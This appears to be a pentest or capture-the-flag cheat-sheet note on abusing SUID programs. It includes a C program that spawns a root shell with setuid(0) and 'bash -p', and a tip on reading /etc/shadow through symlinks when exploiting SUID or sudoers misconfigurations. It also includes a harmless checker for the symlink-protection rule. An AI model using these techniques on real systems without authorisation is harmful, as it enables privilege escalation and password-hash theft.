# SUID Bit

Good list of things to look out for in SUID programs. Seriously, check it out:

<https://repository.root-me.org/Administration/Unix/EN%20-%20Dangers%20of%20SUID%20Shell%20Scripts.pdf>

If you want a root shell when exploiting SUID programs, note that bash and sh drop SUID privileges by default. Use the `-p` flag to avoid dropping privileges (only works for root).

Example C program for exploitation:

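```
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char **argv)
{
    /* Set the real UID to 0 too; succeeds only when the effective UID is already 0. */
    setuid(0);
    /* -p tells bash not to drop privileges when real and effective UIDs differ. */
    system("bash -p");
    return 0;
}
```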

**Symlink tip**: For some reason (presumably security reasons), you cannot read a symlink to `/etc/shadow` (and perhaps other files?) from the `/tmp` or `/dev/shm` folders, even as root, if that symlink wasn’t created by you. But you can do it from any user’s home directory, for example. This can be important when exploiting SUID or sudoers misconfigurations using symlinks.
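The behaviour in the symlink tip matches the Linux `fs.protected_symlinks` hardening, which restricts following symlinks in sticky, world-writable directories. The following is an added example, not code from the original page: a user-space model of that rule for checking whether the protection is active and how it treats a given link. The names `symlink_follow_allowed` and `check_path` are hypothetical, and the effective UID is used as an approximation of the kernel's filesystem UID.

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE 1 /* for lstat() and S_ISVTX under strict -std= modes */
#endif
#include <libgen.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: 1 if the kernel would follow the link, 0 if it would
 * refuse with EACCES. There is no exemption for UID 0. */
int symlink_follow_allowed(int protected_symlinks, uid_t follower_uid,
                           uid_t link_uid, mode_t dir_mode, uid_t dir_uid)
{
    if (!protected_symlinks) return 1;       /* sysctl disabled */
    if (follower_uid == link_uid) return 1;  /* follower owns the link */
    if ((dir_mode & (S_ISVTX | S_IWOTH)) != (S_ISVTX | S_IWOTH))
        return 1;                            /* parent not sticky + world-writable */
    if (dir_uid == link_uid) return 1;       /* directory owner created the link */
    return 0;
}

/* Apply the model to a real path for the calling user; -1 if not a symlink. */
int check_path(const char *path)
{
    struct stat ls, ds;
    char dir[4096];
    int enabled = 1; /* assumption: treat as enabled if the sysctl is unreadable */
    FILE *f = fopen("/proc/sys/fs/protected_symlinks", "r");
    if (f) {
        if (fscanf(f, "%d", &enabled) != 1) enabled = 1;
        fclose(f);
    }
    if (lstat(path, &ls) != 0 || !S_ISLNK(ls.st_mode)) return -1;
    snprintf(dir, sizeof dir, "%s", path);
    if (stat(dirname(dir), &ds) != 0) return -1;
    return symlink_follow_allowed(enabled, geteuid(), ls.st_uid,
                                  ds.st_mode, ds.st_uid);
}

int main(int argc, char **argv)
{
    for (int i = 1; i < argc; i++) {
        int r = check_path(argv[i]);
        printf("%s: %s\n", argv[i], r < 0 ? "not a symlink or unreadable"
                                  : r ? "follow allowed" : "follow denied");
    }
    return 0;
}
```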

